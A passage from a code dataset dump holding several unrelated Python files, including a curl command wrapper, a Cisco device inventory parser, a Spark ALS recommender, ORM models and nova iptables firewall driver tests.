3, 3, 4, 0, 10, 6, 5, -1, -3, 2, 3 ]\n print(longestPeak(array))\n","sub_path":"algoexpert/medium/python/longest_peak.py","file_name":"longest_peak.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"426587665","text":"import re\ndef clean_text(data, target):\n\n if data:\n val = data.replace(target, \"\").strip()\n val = re.sub(r'[^\\w\\s]', \" \", val)\n val = re.sub(r'[\\_]', \" \", val)\n digit_clean = [w for w in val.split() if not w.isdigit()]\n single_letter_clean = ' '.join([w for w in digit_clean if len(w)>2])\n return single_letter_clean.strip().lower()\n else:\n return \"NULL\"","sub_path":"preprocessing/text_processing.py","file_name":"text_processing.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"233242705","text":"#!/usr/bin/python3\n# image_display.py\n# 5/21/2020\n# Aidan Gray\n# aidan.gray@idg.jhu.edu\n#\n# This Python script uses the Watchdog library to monitor the selected directory\n# for newly created FITS files\n\nimport time\nimport logging\nimport sys\nimport pyds9\nimport os\nfrom watchdog.observers import Observer\nfrom watchdog.events import PatternMatchingEventHandler\n#from trius_cam_server import *\n\n#### DS9 Image Display Parameters ####################\nCMAP = '3 0.1' # first number is the contrast, second is bias\nSHOW_RAW = True # display raw images\nSHOW_PRC = True # display processed images\n######################################################\n\ndef log_start():\n \"\"\"\n Create a logfile that the rest of the script can write to.\n\n Output:\n - log \tObject used to access write abilities\n \"\"\"\n\n scriptDir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n scriptName = os.path.splitext(os.path.basename(__file__))[0]\n log = logging.getLogger('file-watch')\n hdlr = logging.FileHandler(scriptDir+'/logs/'+scriptName+'.log')\n formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n hdlr.setFormatter(formatter)\n log.addHandler(hdlr)\n log.setLevel(logging.INFO)\n return log\n\ndef on_created(event):\n \"\"\"\n Sends the new FITS file path to the DS9 open\n\n Input:\n - event The triggered event, containing the filename\n \"\"\"\n global d\n log.info(f\"Created: {event.src_path}\")\n d.set(\"frame clear\")\n d.set(\"file \"+event.src_path)\n time.sleep(1)\n d.set(\"zoom to fit\")\n \nif __name__ == \"__main__\":\n path = sys.argv[1]\n log = log_start()\n try:\n d = pyds9.DS9()\n except:\n print(repr(sys.exc_info()[0])+' '+repr(sys.exc_info()[1])+' '+repr(sys.exc_info()[2]))\n #d = pyds9.DS9()\n\n d.set(\"cmap \"+CMAP)\n\n if SHOW_RAW and SHOW_PRC:\n patterns = [path+\"*.fits\"]\n ignore_patterns = []\n elif SHOW_RAW and not SHOW_PRC:\n patterns = [path+\"raw-*\"]\n ignore_patterns = [path+\"prc-*\"]\n elif not SHOW_RAW and SHOW_PRC:\n patterns = [path+\"prc-*\"]\n ignore_patterns = [path+\"raw-*\"]\n else:\n patterns = []\n ignore_patterns = []\n\n ignore_directories = True\n case_sensitive = True\n\n my_event_handler = PatternMatchingEventHandler(patterns, ignore_patterns, ignore_directories, case_sensitive)\n my_event_handler.on_created = on_created\n go_recursively = True\n\n my_observer = Observer()\n my_observer.schedule(my_event_handler, path, recursive=go_recursively)\n\n my_observer.start()\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n my_observer.stop()\n my_observer.join()\n","sub_path":"tools/image_display.py","file_name":"image_display.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"512349541","text":"#!usr/bin/env python\r\nimport datetime\r\nimport os\r\nimport re\r\nimport sys\r\nsys.path.append('/anonymised/path')\r\nimport jsoncommands\r\n\r\n\r\ndef getlcminfo(todaydate, backupdate):\r\n\r\n\t# globals\r\n\r\n\trootdir = '/anonymised/path/' + todaydate\r\n\tendpath = '/anonymised/path.json'\r\n\r\n\t# RegEx\r\n\r\n\tsoftwarepatterns = ['IOS', 'software, version'] # IOS, catOS\r\n\tversionpatterns = ['IOS.*Version ([\\w.()]+),?', 'Version NmpSW: ([\\w.()]+)']\r\n\thardwarepatterns = ['Cisco ([\\w./-]+) .* processor', 'Model: ([\\w./-]+)', 'Cisco ([\\w./-]+) .* bytes of memory']\r\n\tspecifichardwarepatterns = ['Cisco [\\w.\\/-]+ [(](.*)[)] processor']\r\n\tserialpatterns = ['System serial number\\s*: (\\w+)', 'Processor board ID (\\w+)',\r\n\t\t\t\t\t 'Hardware Version: .* Model: .* Serial #: (\\w+)']\r\n\tlastrebootpatterns = ['uptime is (.*)', 'Uptime is (.*)']\r\n\r\n\tnewjson = {}\r\n\r\n\tsources = os.listdir(rootdir)\r\n\tfound = 0\r\n\tnotfound = 0\r\n\r\n\tfor source in sources:\r\n\t\tsourcedir = rootdir + os.sep + source\r\n\t\tnewjson[source] = []\r\n\t\tfilelist = os.listdir(sourcedir)\r\n\t\tfor file in filelist:\r\n\t\t\tfound += 1\r\n\t\t\thostname = file.split('.')[1].upper()\r\n\t\t\tipaddr = file.split('.')[0].replace('_', '.')\r\n\t\t\tnewdata = {'hostname': hostname, 'software_type': '', 'software_version': '', 'ip_address': ipaddr,\r\n\t\t\t\t\t 'hardware': '', 'hardware_specific': '', 'serial_number': '', 'last_reboot': '', 'uptime': -1,\r\n\t\t\t\t\t 'last_backup': backupdate, 'days_elapsed': 0}\r\n\t\t\tdataloc = sourcedir + os.sep + file\r\n\t\t\twith open(dataloc, 'r') as datafile:\r\n\t\t\t\tdatalines = datafile.readlines()\r\n\t\t\t\tfor dataline in datalines:\r\n\t\t\t\t\tif not newdata['software_type']:\r\n\t\t\t\t\t\tif re.search(softwarepatterns[0], dataline, re.IGNORECASE):\r\n\t\t\t\t\t\t\tnewdata['software_type'] = 'IOS'\r\n\t\t\t\t\t\telif re.search(softwarepatterns[1], dataline, re.IGNORECASE):\r\n\t\t\t\t\t\t\tnewdata['software_type'] = 'CATOS'\r\n\t\t\t\t\tcheckregex(versionpatterns, dataline, 'software_version', newdata)\r\n\t\t\t\t\tcheckregex(hardwarepatterns, dataline, 'hardware', newdata)\r\n\t\t\t\t\tcheckregex(specifichardwarepatterns, dataline, 'hardware_specific', newdata)\r\n\t\t\t\t\tcheckregex(serialpatterns, dataline, 'serial_number', newdata)\r\n\t\t\t\t\tcheckregex(lastrebootpatterns, dataline, 'last_reboot', newdata)\r\n\r\n\t\t\t# handling information\r\n\t\t\textractnum = '(\\d+)'\r\n\r\n\t\t\tif newdata['last_reboot']:\r\n\t\t\t\tfulluptime = newdata['last_reboot'].split(',')\r\n\t\t\t\tnewdata['last_reboot'] = '' # just in case it somehow fails\r\n\t\t\t\ttotaluptime = 0\r\n\t\t\t\tfor uptimepart in fulluptime:\r\n\t\t\t\t\tmagnitude = int(re.search(extractnum, uptimepart).group(1))\r\n\t\t\t\t\tif magnitude:\r\n\t\t\t\t\t\tif 'year' in uptimepart.lower():\r\n\t\t\t\t\t\t\ttotaluptime += magnitude * 365\r\n\t\t\t\t\t\tif 'month' in uptimepart.lower():\r\n\t\t\t\t\t\t\ttotaluptime += magnitude * 30\r\n\t\t\t\t\t\tif 'week' in uptimepart.lower():\r\n\t\t\t\t\t\t\ttotaluptime += magnitude * 7\r\n\t\t\t\t\t\tif 'day' in uptimepart.lower():\r\n\t\t\t\t\t\t\ttotaluptime += magnitude\r\n\t\t\t\tnewdata['last_reboot'] = (datetime.datetime.now() - datetime.timedelta(days=totaluptime)).strftime('%d/%m/%Y')\r\n\t\t\t\tnewdata['uptime'] = totaluptime\r\n\r\n\t\t\tif not newdata['software_version'] or not newdata['hardware'] or not newdata['serial_number'] \\\r\n\t\t\tor not newdata['last_reboot']:\r\n\t\t\t\tprint(hostname + ' did not find all info @ ' + source)\r\n\t\t\t\tprint(newdata)\r\n\t\t\t\tfound -= 1\r\n\t\t\t\tnotfound += 1\r\n\r\n\t\t\tnewjson[source].append(newdata)\r\n\r\n\tjsoncommands.writejson(newjson, endpath)\r\n\tprint('Found: ' + str(found))\r\n\tprint('Not Found: ' + str(notfound))\r\n\r\n\r\ndef checkregex(patterns, dataline, category, newdata):\r\n\tif newdata[category]:\r\n\t\treturn\r\n\tfor pattern in patterns:\r\n\t\tif re.search(pattern, dataline, re.IGNORECASE):\r\n\t\t\tresult = re.search(pattern, dataline, re.IGNORECASE).group(1)\r\n\t\t\tif not '0x' in result: # don't want hex\r\n\t\t\t\tnewdata[category] = result\r\n\t\t\t\treturn\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n\tif raw_input('Type debug to enable debug mode.\\n>') == 'debug':\r\n\t\tnow = datetime.datetime.now() - datetime.timedelta(days=1)\r\n\telse:\r\n\t\tnow = datetime.datetime.now()\r\n\r\n\ttodaydate = now.strftime('%d%m%Y')\r\n\tbackupdate = now.strftime('%d/%m/%Y')\r\n\r\n\tgetlcminfo(todaydate, backupdate)\r\n","sub_path":"getlcminfo.py","file_name":"getlcminfo.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"87004422","text":"'''\r\nCreated on 2016-12-16\r\n\r\n@author: chinple\r\n'''\r\nimport time\r\nfrom tools.cmd.syscmd import CmdExecuter\r\nfrom libs.parser import toJsonObj, toJsonStr\r\nimport os\r\nfrom random import randint\r\n\r\nclass CurlCmdWrapper:\r\n def __init__(self, curlPath='/usr/bin/curl'):\r\n self.curlPath = curlPath\r\n\r\n def makeFormValue(self, name, value, filetype=None):\r\n if isinstance(value, dict) or isinstance(value, list):\r\n value = toJsonStr(value)\r\n return '%s=%s%s' % (name, value, '' if filetype is None else (';type=%s' % filetype))\r\n\r\n def __makeArgs(self, name, value):\r\n if (value is None or value == ''):return ''\r\n return \" %s '%s'\" % (name, str(value).replace(\"'\", \"''\"))\r\n\r\n def _makeCurlCmd(self, url, curlBody, command, headers, headerFile, isFormRequest, sslVersion):\r\n\r\n header, body, fargs = \"\", \"\", \"\"\r\n\r\n # body\r\n if isFormRequest:\r\n for fn in curlBody:\r\n body += self.__makeArgs(\"--form\", curlBody[fn])\r\n elif curlBody != '':\r\n body = self.__makeArgs(\"-d\", curlBody)\r\n\r\n # header\r\n if headers is not None:\r\n for h in headers.keys():\r\n header += self.__makeArgs(\"-H\" , \"%s:%s\" % (h, headers[h]))\r\n header += self.__makeArgs(\"-D\", headerFile)\r\n\r\n return \"{curl} {request} {ssl} '{url}' {body} {fargs} {header}\".format(curl=self.curlPath,\r\n request=self.__makeArgs('--request', command), ssl=('-k -%s' % sslVersion) if sslVersion > 0 else \"\",\r\n url=url, body=body, fargs=fargs, header=header)\r\n\r\n def _parseHeaderFile(self, headerFile):\r\n header = {}\r\n for l in open(headerFile, 'r').read().split('\\r\\n'):\r\n try:\r\n i = l.index(\":\")\r\n header[l[0:i].strip().lower()] = l[i + 1:].strip()\r\n except:pass\r\n os.system(\"rm -rf %s\" % headerFile)\r\n return header\r\n \r\n def curlByCmd(self, url, body=None, command=None, isFormRequest=False, headers=None, isRespHeader=False, isLogResp=True, logHandler=None, sslVersion=-1):\r\n headerFile = (\"header-%s-%s.txt\" % (time.time(), randint(10, 1000))) if isRespHeader else None\r\n curlcmd = self._makeCurlCmd(url, body, command, headers, headerFile, isFormRequest, sslVersion)\r\n if logHandler:\r\n logHandler(curlcmd)\r\n\r\n resp = CmdExecuter(curlcmd)\r\n if isLogResp and logHandler:\r\n logHandler(resp)\r\n try:\r\n resp = toJsonObj(str(resp))\r\n except:pass\r\n\r\n if isRespHeader:\r\n return self._parseHeaderFile(headerFile), resp\r\n else:\r\n return resp\r\n","sub_path":"tools/stool/syscmdcurl.py","file_name":"syscmdcurl.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"636290080","text":"\"\"\"Supports the MCP3008 ADC using PiGPIO\"\"\"\n\nimport logging\n\nfrom homecontrol.dependencies.entity_types import Item\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass MCP3008ADC(Item):\n \"\"\"The MCP3008ADC item\"\"\"\n handle = None\n\n async def init(self) -> bool:\n \"\"\"Initialise the item\"\"\"\n self.handle = self.cfg[\"pigpio_adapter\"].pigpio.spi_open(\n spi_channel=self.cfg[\"spi_channel\"],\n baud=self.cfg[\"baud_rate\"],\n spi_flags=self.cfg[\"spi_flags\"]\n )\n\n def get_value(self, channel: int) -> int:\n \"\"\"Get the value for one channel\"\"\"\n adc = self.cfg[\"pigpio_adapter\"].pigpio.spi_xfer(\n self.handle, [1, (8 + channel) << 4, 0])[1]\n return ((adc[1] & 3) << 8) + adc[2]\n\n async def stop(self):\n \"\"\"Stop the item\"\"\"\n if self.handle is not None:\n try:\n self.cfg[\"pigpio_adapter\"].pigpio.spi_close(self.handle)\n except BrokenPipeError:\n LOGGER.warning(\"SPI transport not properly closed for %s\",\n self.identifier)\n\n\nclass AnalogInput(Item):\n \"\"\"Item that holds an analog reading\"\"\"\n async def init(self):\n \"\"\"Initialise the item\"\"\"\n self.adc = self.cfg[\"adc\"]\n self.raw_value = 0\n\n async def get_value(self) -> int:\n \"\"\"Getter for the value\"\"\"\n new_raw_value = self.adc.get_value(self.cfg[\"channel\"])\n if abs(self.raw_value - new_raw_value) >= self.cfg[\"change_threshold\"]:\n self.raw_value = new_raw_value\n return self.value(self.raw_value)\n\n def value(self, raw_val) -> int:\n \"\"\"\n Translate the raw reading\n to a range defined in the item's configuration\n \"\"\"\n return int(\n self.cfg[\"min\"]\n + raw_val * (self.cfg[\"max\"]\n - self.cfg[\"min\"]) / 1023\n + 0.5)\n","sub_path":"homecontrol/modules/mcp3008_adc/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"154132526","text":"import os\nimport re\nfrom setuptools import setup\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n\nwith open(\"./requirements.txt\", \"r\") as f:\n requirements = []\n for line in f:\n requirements.append(line.strip())\n\n\ndef get_version(package):\n \"\"\"\n Return package version as listed in `__version__` in `init.py`.\n \"\"\"\n with open(os.path.join(package, \"__init__.py\")) as f:\n return re.search(\"__version__ = ['\\\"]([^'\\\"]+)['\\\"]\", f.read()).group(1)\n\n\ndef get_packages(package):\n \"\"\"\n Return root package and all sub-packages.\n \"\"\"\n return [\n dirpath\n for dirpath, dirnames, filenames in os.walk(package)\n if os.path.exists(os.path.join(dirpath, \"__init__.py\"))\n ]\n\n\nkeywords = \"orm async aiohttp asyncio databases database postgres sqlite\"\n\nsetup(\n name=\"duck-orm\",\n version=\"0.1.0\",\n author=\"Rich Carvalho\",\n python_requires=\">=3.8\",\n author_email=\"richelton14@gmail.com\",\n description=\"DuckORM is package is an asynchronous ORM for Python\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=get_packages(\"duck_orm\"),\n install_requires=requirements,\n extras_require={\n \"postgresql\": [\"asyncpg\"],\n \"postgresql+aiopg\": [\"aiopg\"],\n \"sqlite\": [\"aiosqlite\"]\n },\n include_package_data=True,\n url=\"https://github.com/richecr/duck-orm\",\n project_urls={\n \"Código fonte\": \"https://github.com/richecr/duck-orm\",\n },\n keywords=keywords,\n license=\"MIT\"\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"568177666","text":"from flask_restx import Resource, fields, Namespace\n\nfrom authorization import requires_auth, requires_scope, get_all_roles\n\n\napi = Namespace('groups', description='Extra-Simple operations on groups.', path='/')\n\n\ngroup_output = api.model('GroupOutput', { 'id': fields.String() })\ngroups_output = fields.List(fields.Nested(group_output))\n\n\n@api.route('/group')\nclass GroupsResource(Resource):\n @api.doc(security='token', model=groups_output)\n @requires_auth\n # @requires_scope('read:groups')\n def get(self):\n return [\n {'id': role}\n for role\n in get_all_roles()\n ]\n","sub_path":"server/api/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"21701104","text":"import re\r\nfrom itertools import permutations as perm\r\n\r\n# converting txt file of english words to set\r\nwith open('cdwords.txt', 'r') as cdwords:\r\n cdwords = cdwords.read()\r\n wordregex = re.compile('\\w+')\r\n cdwords = wordregex.findall(cdwords)\r\n cdwords = set(cdwords)\r\n\r\n\r\n# 123456789\r\ncharacters = list('ABCDEFGHI'.lower())\r\nlength = len(characters)\r\nwords = set()\r\nalphabet = set('abcdefghijklmnopqrstuvwxyz')\r\nnot_alpha = alphabet.difference(set(characters))\r\n\r\npossible = set()\r\n\r\n# Ruling out words which contain letters not in 'characters'\r\nfor word in cdwords:\r\n for letter in not_alpha:\r\n if letter in word:\r\n break\r\n else:\r\n possible.add(word)\r\n\r\n# Finding every permutation of 'characters' for each length from 1 to how many letters there are\r\nfor l in range(1, length + 1):\r\n for subset in perm(characters, l):\r\n word = ''.join(subset)\r\n words.add(word)\r\n\r\nprint(f'{len(words)} permutations possible')\r\n\r\nwords = list(words)\r\nwords.sort()\r\n\r\nresults = []\r\n\r\n# Checking which words can be created from the characters\r\nfor w in words:\r\n if w in possible:\r\n results.append(w)\r\n\r\nd = {}\r\ntotal = 0\r\n\r\n# Placing all possible words in dictionary according to their length\r\nfor l in range(1, length + 1):\r\n d[l] = []\r\n for word in results:\r\n if len(word) == l:\r\n d[l].append(word)\r\n total += len(d[l])\r\n\r\nfor l in range(length, 0, -1):\r\n print(f'{l} letter words: {d[l]}')\r\n\r\nprint(f'{total} words found')\r\n","sub_path":"cdwords.py","file_name":"cdwords.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"463297918","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n# We need sys to get the command line arguments\nimport sys\n\n# And pyspark.sql to get the spark session\nfrom pyspark.sql import SparkSession\nfrom pyspark import SparkConf\nfrom pyspark.ml.recommendation import ALS, ALSModel\nfrom pyspark.mllib.evaluation import RankingMetrics\nfrom pyspark.sql import functions as F\n\n\ndef main(spark, train_file, test_file, rank, reg, alpha):\n '''Main routine for supervised training\n Parameters\n ----------\n spark : SparkSession object\n data_file : string, path to the parquet file to load\n model_file : string, path to store the serialized model file\n '''\n\n # Load the dataframe\n train = spark.read.parquet(train_file)\n test = spark.read.parquet(test_file)\n\n # Give the dataframe a temporary view so we can run SQL queries\n train.createOrReplaceTempView('train')\n test.createOrReplaceTempView('test')\n\n # Build model for input parameters\n rank = float(rank)\n reg = float(reg)\n alpha = float(alpha)\n\n als = ALS(implicitPrefs=True, userCol=\"user_idx\", itemCol=\"item_idx\", ratingCol=\"count\")\\\n .setParams(rank=rank, regParam=reg, alpha=alpha) \n model = als.fit(train)\n\n print(\"model fitted\")\n \n # Create predition and truth lists\n k = 500\n\n recommendations = model.recommendForUserSubset(test,k)\n perUserRecom = recommendations.selectExpr(\"user_idx\", \"recommendations.item_idx as prediction\")\n label_list = test.orderBy(F.col(\"user_idx\"), F.expr(\"count DESC\")).groupby(\"user_idx\").agg(F.expr(\"collect_list(item_idx) as label\"))\n perUserItem = label_list.select(\"user_idx\", \"label\")\n\n print(\"predition and label\")\n\n predictionAndLabel = perUserItem.join(perUserRecom, \"user_idx\").rdd.map(lambda row: (row.prediction, row.label))\n\n print(\"inner join\")\n\n # Use Ranking Metrics for evaluation\n metrics=RankingMetrics(predictionAndLabel)\n mean_precision = metrics.meanAveragePrecision\n\n print(\"At rank={0}, regParam={1}, alpha = {2}, mean average precision is {3}\".format(rank, reg, alpha, mean_precision))\n\n # Use only for final indexed_test.parquet\n k_precision = metrics.precisionAt(k)\n print(\"At rank={0}, regParam={1}, alpha = {2}, precision at top 500 words is {3}\".format(rank, reg, alpha, k_precision))\n\n pass\n\n\n\n# Only enter this block if we're in main\nif __name__ == \"__main__\":\n\n # Create the spark session object\n spark = SparkSession.builder.appName('als_baseline').getOrCreate()\n\n # Get the filename from the command line\n train_file = sys.argv[1]\n test_file = sys.argv[2]\n\n # get parameters\n rank = sys.argv[3]\n reg = sys.argv[4]\n alpha = sys.argv[5]\n\n # Call our main routine\n main(spark, train_file, test_file, rank, reg, alpha)\n \n","sub_path":"Music_Recommender/als_baseline.py","file_name":"als_baseline.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"99934730","text":"from modules.db_connector import *\nfrom modules.label import Label\nfrom modules.attendant import Attendant\n\nclass Connection(Base):\n __tablename__ = 'connection'\n __table_args__ = {'extend_existing':True}\n\n id = Column(Integer, primary_key=True)\n attendant_id = Column(ForeignKey('attendant.id'))\n exhibitor = Column(ForeignKey('exhibitor.id'))\n comment = Column(String)\n\n\n def __init__(self, exhibitor_id, attendant):\n self.attendant_id = attendant\n self.exhibitor = exhibitor_id\n self.comment = None\n self.labels = []\n\n def get_exhibitor(self):\n return self.exhibitor\n\n def add_comment(self, comment):\n global session\n session = Session()\n session.query(Connection).filter_by(id = self.id).update({'comment':comment})\n session.flush()\n session.commit()\n session.close()\n\n def add_label(self, label):\n global session\n session = Session()\n label_connection = Label_to_Connection(label.id, self.id)\n session.add(label_connection)\n session.commit()\n session.close()\n\n def get_labels(self):\n global session\n session = Session()\n labels = session.query(Label).join(Label_to_Connection).filter_by(connection_id=self.id).all()\n session.expunge_all()\n session.close()\n return labels\n\n def get_data(self):\n labels = self.get_labels()\n session = Session()\n\n attendant = session.query(Attendant).filter_by(id=self.attendant_id).first()\n session.expunge_all()\n session.close()\n\n connection_data = {\n 'comment': self.comment,\n 'labels':[],\n 'attendant': attendant.get_data(),\n 'id':self.id\n }\n for label in labels:\n connection_data['labels'].append(label.get_data())\n return connection_data\n\n\n @classmethod\n def get_connection(cls, connection_id):\n global session\n session = Session()\n connection = session.query(Connection).filter_by(id=connection_id).first()\n session.expunge_all()\n session.close()\n return connection\n\n @classmethod\n def get_connection_by_users(cls, exhibitor_id, attendant_id):\n global session\n session = Session()\n connection = session.query(Connection).filter_by(exhibitor=exhibitor_id).filter_by(attendant_id = attendant_id).first()\n session.expunge_all()\n session.close()\n return connection\n\n @classmethod\n def get_all_connections(cls, exhibitor_id):\n global session\n session = Session()\n connections = session.query(Connection).filter_by(exhibitor=exhibitor_id).all()\n session.close()\n return connections\n\n @classmethod\n def get_every_connection(cls):\n global session\n session = Session()\n result = session.query(Connection).all()\n session.close()\n return result\n\n\nclass Label_to_Connection(Base):\n __tablename__ = 'label_to_connection'\n __table_args__ = {'extend_existing':True}\n\n label_id = Column(ForeignKey('label.id'), primary_key=True)\n connection_id = Column(ForeignKey('connection.id'), primary_key=True)\n\n def __init__(self, label, connection):\n self.label_id = label\n self.connection_id = connection\n\n\n @classmethod\n def remove(cls, connection_id):\n global session\n session = Session()\n connections = session.query(Label_to_Connection).filter_by(connection_id=connection_id).delete()\n session.commit()\n session.close()\n return connections\n","sub_path":"modules/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"415598484","text":"# Problem[2050] : 알파벳으로 이루어진 문자열을 입력 받아 각 알파벳을 1부터 26까지의 숫자로 변환하여 출력하라.\n# 문자열의 최대 길이는 200이다.\n\n# ASCII code : A = 65 , Z = 90\n\nstring = input()\nAlpha_dict = dict()\nresult = list()\nfor i in string :\n if i not in Alpha_dict :\n Alpha_dict[i] = ord(i) - 64\n\nfor value in Alpha_dict.values() :\n result.append(value)\n\nresult_string = ' '.join(map(str,result))\n\nprint(result_string)","sub_path":"SWEA/D1/SWEA_2050.py","file_name":"SWEA_2050.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"530597323","text":"\"\"\"Module for the node for a binary tree\"\"\"\r\n\r\n\r\nclass BTNode:\r\n \"\"\"Represents a node for a linked binary search tree.\"\"\"\r\n def __init__(self, data, left=None, right=None):\r\n \"\"\"(BTNode, str)\r\n\r\n A new node for binary tree.\r\n \"\"\"\r\n self.data = data\r\n self.left = left\r\n self.right = right\r\n","sub_path":"btnode.py","file_name":"btnode.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"650941907","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nimport mock\n\nfrom nova import objects\nfrom nova import test\nfrom nova.virt import firewall\n\n_IPT_DRIVER_CLS = firewall.IptablesFirewallDriver\n_FN_INSTANCE_RULES = 'instance_rules'\n_FN_ADD_FILTERS = 'add_filters_for_instance'\n\n\nclass TestIptablesFirewallDriver(test.NoDBTestCase):\n def setUp(self):\n super(TestIptablesFirewallDriver, self).setUp()\n self.driver = _IPT_DRIVER_CLS()\n\n @mock.patch('nova.network.linux_net.iptables_manager')\n def test_constructor(self, iptm_mock):\n self.driver.__init__()\n\n self.assertEqual({}, self.driver.instance_info)\n self.assertEqual(False, self.driver.dhcp_create)\n self.assertEqual(False, self.driver.dhcp_created)\n self.assertEqual(iptm_mock, self.driver.iptables)\n\n # NOTE(jaypipes): Here we are not testing the IptablesManager\n # constructor. We are only testing the calls made against the\n # IptablesManager singleton during initialization of the\n # IptablesFirewallDriver.\n expected = [\n mock.call.add_chain('sg-fallback'),\n mock.call.add_rule('sg-fallback', '-j DROP'),\n ]\n iptm_mock.ipv4.__getitem__.return_value \\\n .assert_has_calls(expected)\n iptm_mock.ipv6.__getitem__.return_value \\\n .assert_has_calls(expected)\n\n def test_filter_defer_apply_on(self):\n with mock.patch.object(self.driver.iptables,\n 'defer_apply_on') as dao_mock:\n self.driver.filter_defer_apply_on()\n dao_mock.assert_called_once_with()\n\n def test_filter_defer_apply_off(self):\n with mock.patch.object(self.driver.iptables,\n 'defer_apply_off') as dao_mock:\n self.driver.filter_defer_apply_off()\n dao_mock.assert_called_once_with()\n\n @mock.patch.object(_IPT_DRIVER_CLS, 'remove_filters_for_instance')\n def test_unfilter_instance_valid(self, rfii_mock):\n with mock.patch.object(self.driver, 'instance_info') as ii_mock, \\\n mock.patch.object(self.driver, 'iptables') as ipt_mock:\n fake_instance = objects.Instance(id=123)\n ii_mock.pop.return_value = True\n\n self.driver.unfilter_instance(fake_instance, 'fakenetinfo')\n\n ii_mock.pop.assert_called_once_with(fake_instance.id, None)\n rfii_mock.assert_called_once_with(fake_instance)\n ipt_mock.apply.assert_called_once_with()\n\n @mock.patch.object(_IPT_DRIVER_CLS, 'remove_filters_for_instance')\n def test_unfilter_instance_invalid(self, rfii_mock):\n with mock.patch.object(self.driver, 'instance_info') as ii_mock, \\\n mock.patch.object(self.driver, 'iptables') as ipt_mock:\n fake_instance = objects.Instance(id=123)\n ii_mock.pop.return_value = False\n\n self.driver.unfilter_instance(fake_instance, 'fakenetinfo')\n\n ii_mock.pop.assert_called_once_with(fake_instance.id, None)\n self.assertFalse(rfii_mock.called)\n self.assertFalse(ipt_mock.apply.called)\n\n def setup_instance_filter(self, i_rules_mock):\n # NOTE(chenli) The IptablesFirewallDriver init method calls the\n # iptables manager, so we must reset here.\n self.driver.iptables = mock.MagicMock()\n\n i_mock = mock.MagicMock(spec=dict)\n i_mock.id = 'fake_id'\n i_rules_mock.return_value = (mock.sentinel.v4_rules,\n mock.sentinel.v6_rules)\n return i_mock\n\n @mock.patch.object(_IPT_DRIVER_CLS, _FN_ADD_FILTERS)\n @mock.patch.object(_IPT_DRIVER_CLS, _FN_INSTANCE_RULES)\n def test_prepare_instance_filter(self, i_rules_mock, add_filters_mock):\n i_mock = self.setup_instance_filter(i_rules_mock)\n\n self.driver.prepare_instance_filter(i_mock, mock.sentinel.net_info)\n\n i_rules_mock.assert_called_once_with(i_mock, mock.sentinel.net_info)\n add_filters_mock.assert_called_once_with(\n i_mock, mock.sentinel.net_info,\n mock.sentinel.v4_rules, mock.sentinel.v6_rules)\n self.driver.iptables.apply.assert_called_once_with()\n # When DHCP created flag is False, make sure we don't set any filters\n gi_mock = self.driver.iptables.ipv4.__getitem__.return_value\n self.assertFalse(gi_mock.called)\n\n @mock.patch.object(_IPT_DRIVER_CLS, _FN_ADD_FILTERS)\n @mock.patch.object(_IPT_DRIVER_CLS, _FN_INSTANCE_RULES)\n def test_prepare_instance_filter_with_dhcp_create(self, i_rules_mock,\n add_filters_mock):\n\n i_mock = self.setup_instance_filter(i_rules_mock)\n # add rules when DHCP create is set\n self.driver.dhcp_create = True\n\n self.driver.prepare_instance_filter(i_mock, mock.sentinel.net_info)\n\n expected = [\n mock.call.add_rule(\n 'INPUT',\n '-s 0.0.0.0/32 -d 255.255.255.255/32 '\n '-p udp -m udp --sport 68 --dport 67 -j ACCEPT'),\n mock.call.add_rule(\n 'FORWARD',\n '-s 0.0.0.0/32 -d 255.255.255.255/32 '\n '-p udp -m udp --sport 68 --dport 67 -j ACCEPT')\n ]\n self.driver.iptables.ipv4.__getitem__.return_value.assert_has_calls(\n expected)\n\n @mock.patch.object(_IPT_DRIVER_CLS, 